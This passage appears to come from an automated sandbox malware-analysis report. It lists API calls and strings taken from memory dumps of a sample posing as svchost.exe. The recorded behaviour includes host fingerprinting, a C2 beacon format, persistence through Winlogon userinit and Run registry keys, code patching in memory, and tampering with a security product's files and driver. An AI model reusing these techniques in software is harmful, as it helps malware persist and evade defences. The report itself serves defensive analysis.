                                                                                                                                                                                                                      • Part of subcall function 02C934A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: StrChrIA.SHLWAPI(?,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: lstrcpynA.KERNEL32(7736C3F0,00000001,00000104,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C935D4
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C935E3
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C935EA
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C93602
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93619
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9361F
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93640
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: StrChrIA.SHLWAPI(?,?,00000000,00000000,?,?,?,?,00000000), ref: 02C93667
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: lstrcpynA.KERNEL32(00000000,00000001,00000104,?,00000000,00000000,?,?,?,?,00000000), ref: 02C9367B
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76232F70,7736C3F0), ref: 02C73164
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,?,?,76232F70,7736C3F0), ref: 02C73171
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C73188
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76232F70,7736C3F0), ref: 02C731AE
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,02C8598D,?,?,?,76232F70,7736C3F0), ref: 02C731CF
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,76232F70,7736C3F0), ref: 02C731D9
                                                                                                                                                                                                                    • CharUpperA.USER32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C731F4
                                                                                                                                                                                                                    • CharUpperA.USER32(00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C731F8
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73210
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7326F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C7329E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732A7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732B3
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732B6
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732C6
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732C9
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732D5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732D8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                                    • String ID: %02X$%45%4E%47%49%4E%45%45%52%21%32%32%36%35%33%33%21%31%43%45%33%41%41%44%31$%s!%s!%08X$user!226533!1CE3AAD1$InstallDate$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                                    • API String ID: 3299431409-2925837445
                                                                                                                                                                                                                    • Opcode ID: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                                    • Instruction ID: 75e312b9e7ffe3699f6f3bebc38541af77f4571995b644781dfedd3aa8380b83
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A51C6B1E40295ABDB11CBA59C89FEBBBBCEF84704F0445D5E905E7141E7709A048BA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88DF6
                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88DFD
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C88E06
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(02C890E0,00000008,00000040,?,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C88E27
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02C88E46
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02C88E62
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02C88E78
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02C88E86
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88E91
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02C88EA4
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02C88EB5
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02C88EC4
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02C88ED3
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02C88EE2
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000006,?), ref: 02C88EEA
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02C88EFD
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02C88F0E
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02C88F1D
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88F29
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02C88F33
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88F3B
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 02C88F42
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2984368831-0
                                                                                                                                                                                                                    • Opcode ID: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                                    • Instruction ID: f67128f16ff17653a9e34e1d7b9161699e35eac166b0b198bcee514057c584d9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13517371941219EFE711AF74CC46FAE77ACFF49310F154928F986E3180DB3899518BA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                    • API String ID: 33631002-3172865025
                                                                                                                                                                                                                    • Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74413
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,762335B0,00000000), ref: 02C7441E
                                                                                                                                                                                                                    • Process32First.KERNEL32 ref: 02C74441
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7445D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C74477
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C744B0
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C744B7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C744CB
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02C744FC
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02C74513
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7457C
                                                                                                                                                                                                                    • Process32Next.KERNEL32(?,?), ref: 02C7458B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                                    • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                                    • API String ID: 3808533164-4214784430
                                                                                                                                                                                                                    • Opcode ID: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
                                                                                                                                                                                                                    • Instruction ID: a58d1df14372a35efa8db0775b27ced9be746b89a85be76ce4bc9d0dd6485024
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5661E171A44381AFD326DB24D848FA7BBF9EFC4704F048A58F89587240E770D608CBA2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$strstrstrtol
                                                                                                                                                                                                                    • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                                    • API String ID: 600650289-3097137778
                                                                                                                                                                                                                    • Opcode ID: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
                                                                                                                                                                                                                    • Instruction ID: da856dfcd850f2cb1d291f491d62d00feefe61db9d72616daca149179db0e07f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7719E71E482599BDB26CB78AC90BDEBBB5EF48300F0445E8ED49E3281D3705B45CBA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C88C7A
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C88C87
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02C88CA4
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000188F0,?,00000000,00000000), ref: 02C88CED
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C88D05
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C88D16
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 02C88D28
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C88D40
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C88D60
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C88DAA
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C88DB7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • name=%s&port=%u, xrefs: 02C88D4F
                                                                                                                                                                                                                    • %45%4E%47%49%4E%45%45%52%21%32%32%36%35%33%33%21%31%43%45%33%41%41%44%31, xrefs: 02C88D4A
                                                                                                                                                                                                                    • /home.php, xrefs: 02C88D91
                                                                                                                                                                                                                    • SystemDrive, xrefs: 02C88C75
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: %45%4E%47%49%4E%45%45%52%21%32%32%36%35%33%33%21%31%43%45%33%41%41%44%31$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                                    • API String ID: 1291007772-3632277759
                                                                                                                                                                                                                    • Opcode ID: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
                                                                                                                                                                                                                    • Instruction ID: 19e462e9301785fa3939d799fcd2f6b6f711ed7f5f2997c3c6809450ae5e9672
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E419571A80249BFEB15EB60CC49FE9777DEF84704F0086D4B605A7180EBB09B448BA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,762335B0,00000000,?,?,?,?,02C74FC0,00000000), ref: 02C74677
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746BD
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746C4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C746D7
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7471D
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000), ref: 02C74754
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02C74FC0,02C74FC1,000000EA,00000000), ref: 02C7478C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C7479F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C747A2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C747AF
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C747B2
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C747C5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FreeProcess$Buffer$AllocDisplayFileInformationQueryValidateWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: %S$netuser{
                                                                                                                                                                                                                    • API String ID: 639091076-3648794683
                                                                                                                                                                                                                    • Opcode ID: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
                                                                                                                                                                                                                    • Instruction ID: a09513ab196caa84cab5f38fd2b69e8b71630842e68712c06780eeb64ca6a33b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B51D871E40259ABDF26CFA4DC58BEFBBB9EF85701F144695E804E7244D7309A04CBA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                    • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                    • API String ID: 606440919-2829233815
                                                                                                                                                                                                                    • Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                                    • Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C73335
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C73361
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73399
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02C733EE
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • software\microsoft\windows\currentversion\run, xrefs: 02C733E4
                                                                                                                                                                                                                    • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C733AD
                                                                                                                                                                                                                    • userinit, xrefs: 02C73406
                                                                                                                                                                                                                    • C:\Windows\apppatch\svchost.exe, xrefs: 02C733C4, 02C733FB
                                                                                                                                                                                                                    • SystemDrive, xrefs: 02C7334F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                                    • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                                    • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                                    • userinit, xrefs: 00402918
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
